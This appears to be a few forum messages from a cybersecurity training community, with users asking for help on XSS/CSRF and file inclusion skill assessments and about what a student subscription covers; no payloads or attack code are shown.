Hey guys, I'm working on the Advanced XSS and CSRF Exploitation - Skills Assessment. I'm stuck at the last part. I've tried variations of the payload shown as an example in that section of the module, but I either get no response or I get ||{"error":"Something went wrong"}||. I know what I'm supposed to do, but I can't seem to figure out how to correctly modify the payload. Is anyone available for help?

yo guys, i want tips on file inlcusion skill assesment

try everything from the module

I have a question about subscription and a path, student subscription to be exact. I want to start learning with Junior Cybersecurity Analyst and i don't have a subscription yet. If i buy a student subscription will i need to purchase anything more? Will it cover the entire path?